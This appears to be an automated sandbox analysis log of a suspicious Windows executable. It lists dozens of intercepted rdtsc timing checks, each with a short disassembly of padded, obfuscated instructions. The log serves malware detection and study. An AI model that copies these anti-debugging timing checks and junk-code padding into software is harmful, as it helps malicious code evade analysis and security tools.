    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBA8B6 second address: CBA8BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC06AB second address: CC06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b ja 00007FB5F8D48AB6h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC06BC second address: CC06D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48014h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0940 second address: AE3CF5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 22065FE3h 0x0000000f jnl 00007FB5F8D48ACCh 0x00000015 jmp 00007FB5F8D48AC6h 0x0000001a push dword ptr [ebp+122D0445h] 0x00000020 pushad 0x00000021 mov ax, bx 0x00000024 jmp 00007FB5F8D48ABFh 0x00000029 popad 0x0000002a call dword ptr [ebp+122D374Ch] 0x00000030 pushad 0x00000031 pushad 0x00000032 jmp 00007FB5F8D48AC4h 0x00000037 pushad 0x00000038 stc 0x00000039 jmp 00007FB5F8D48AC5h 0x0000003e popad 0x0000003f popad 0x00000040 mov dword ptr [ebp+122D1860h], edx 0x00000046 xor eax, eax 0x00000048 jmp 00007FB5F8D48AC7h 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 jmp 00007FB5F8D48AC0h 0x00000056 mov dword ptr [ebp+122D3C0Dh], eax 0x0000005c or dword ptr [ebp+122D19F9h], esi 0x00000062 mov esi, 0000003Ch 0x00000067 clc 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D3436h], eax 0x00000072 lodsw 0x00000074 jmp 00007FB5F8D48ABFh 0x00000079 mov dword ptr [ebp+122D1860h], ecx 0x0000007f add eax, dword ptr [esp+24h] 0x00000083 jnp 00007FB5F8D48AB7h 0x00000089 mov ebx, dword ptr [esp+24h] 0x0000008d cld 0x0000008e push eax 0x0000008f pushad 0x00000090 push eax 0x00000091 push edx 0x00000092 push eax 0x00000093 push edx 0x00000094 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5564 second address: CC5568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC5568 second address: CC556E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC41C8 second address: CC41E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48012h 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007FB5F8D48006h 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4836 second address: CC483A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4B33 second address: CC4B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4B39 second address: CC4B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4B3F second address: CC4B43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4DD2 second address: CC4DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4DEC second address: CC4E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jno 00007FB5F8D48006h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007FB5F8D48006h 0x00000016 jg 00007FB5F8D48006h 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E08 second address: CC4E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4F7C second address: CC4FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48012h 0x00000009 jmp 00007FB5F8D4800Dh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007FB5F8D4801Eh 0x00000018 jmp 00007FB5F8D48016h 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 popad 0x00000022 pop eax 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC52B8 second address: CC52CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007FB5F8D48AB6h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jng 00007FB5F8D48AB6h 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC95C1 second address: CC95C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC95C5 second address: CC95CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC95CB second address: CC95D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC95D5 second address: CC95D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC99F3 second address: CC9A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB5F8D48006h 0x0000000a popad 0x0000000b js 00007FB5F8D4800Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9100 second address: CC911A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007FB5F8D48AB6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC911A second address: CC911E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC911E second address: CC9124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9E3B second address: CC9E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9E41 second address: CC9E4D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB5F8D48AB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9E4D second address: CC9E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB5F8D4800Bh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE5B7 second address: CCE5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007FB5F8D48AC1h 0x00000012 pop edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE5D6 second address: CCE5E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB5F8D4800Ah 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEB7B second address: CCEB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEB81 second address: CCEB87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEE56 second address: CCEE62 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB5F8D48AB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEFF1 second address: CCEFF7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCEFF7 second address: CCF009 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF2DD second address: CCF2F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB5F8D48015h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DD96 second address: C7CFA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FB5F8D48ABEh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FB5F8D48AB8h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 jmp 00007FB5F8D48AC2h 0x0000002b call dword ptr [ebp+122D36BBh] 0x00000031 jmp 00007FB5F8D48AC7h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b jmp 00007FB5F8D48AC3h 0x00000040 jg 00007FB5F8D48AB6h 0x00000046 popad 0x00000047 pushad 0x00000048 jne 00007FB5F8D48AB6h 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DFAF second address: C9DFB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FB5F8D48006h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E4B9 second address: C9E4DB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB5F8D48ABCh 0x00000008 jno 00007FB5F8D48AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB5F8D48ABEh 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E75B second address: C9E75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E75F second address: C9E765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9E765 second address: C9E769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9EE14 second address: C9EE19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9F0C0 second address: C9F0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6939 second address: CD6947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48ABAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6947 second address: CD6985 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB5F8D48017h 0x00000008 jo 00007FB5F8D48006h 0x0000000e jmp 00007FB5F8D4800Bh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 jmp 00007FB5F8D48010h 0x0000001d pop eax 0x0000001e jmp 00007FB5F8D4800Fh 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6D83 second address: CD6D9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48AC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6D9B second address: CD6DB2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB5F8D4800Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6DB2 second address: CD6DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FB5F8D48AC7h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD6DCE second address: CD6DD8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB5F8D48012h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD722C second address: CD7232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7232 second address: CD723E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD723E second address: CD7242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDB4E1 second address: CDB4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D4800Dh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD8A5 second address: CDD8AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55C06 second address: C55C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C55C0A second address: C55C1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 pop eax 0x00000009 jng 00007FB5F8D48AB6h 0x0000000f pop esi 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD35E second address: CDD362 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD362 second address: CDD366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD4AF second address: CDD4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ecx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD4B8 second address: CDD4CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB5F8D48ABCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD4CE second address: CDD4D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD4D4 second address: CDD4F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB5F8D48ACDh 0x0000000c jmp 00007FB5F8D48AC1h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDD4F3 second address: CDD4F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0338 second address: CE0359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jne 00007FB5F8D48ACCh 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE551C second address: CE5521 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5521 second address: CE5533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB5F8D48ABAh 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4BE5 second address: CE4C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jne 00007FB5F8D4800Ah 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007FB5F8D4800Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EA7 second address: CE4EB5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB5F8D48AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EB5 second address: CE4EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EBB second address: CE4EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EBF second address: CE4EC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EC3 second address: CE4EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4EC9 second address: CE4ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE4ECE second address: CE4ED4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE51CE second address: CE51D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE51D2 second address: CE51DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB5F8D48AB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE51DC second address: CE51E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE51E8 second address: CE51EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE51EC second address: CE51F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA936 second address: CEA942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB5F8D48AB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA942 second address: CEA970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FB5F8D4801Fh 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FB5F8D48006h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA970 second address: CEA974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4F049 second address: C4F065 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB5F8D48013h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4F065 second address: C4F078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop ecx 0x00000008 jl 00007FB5F8D48AD2h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9444 second address: CE9448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9997 second address: CE999E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE999E second address: CE99A8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB5F8D4800Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE99A8 second address: CE99B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE99B0 second address: CE99B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9C75 second address: CE9C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9C79 second address: CE9C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FB5F8D4801Dh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE504 second address: CEE52F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB5F8D48AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB5F8D48AC3h 0x0000000f push eax 0x00000010 pushad 0x00000011 popad 0x00000012 jnl 00007FB5F8D48AB6h 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE52F second address: CEE548 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jnl 00007FB5F8D4800Ch 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE548 second address: CEE556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEED3F second address: CEED45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4136 second address: CF413A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF413A second address: CF4152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FB5F8D4800Eh 0x0000000f rdtsc
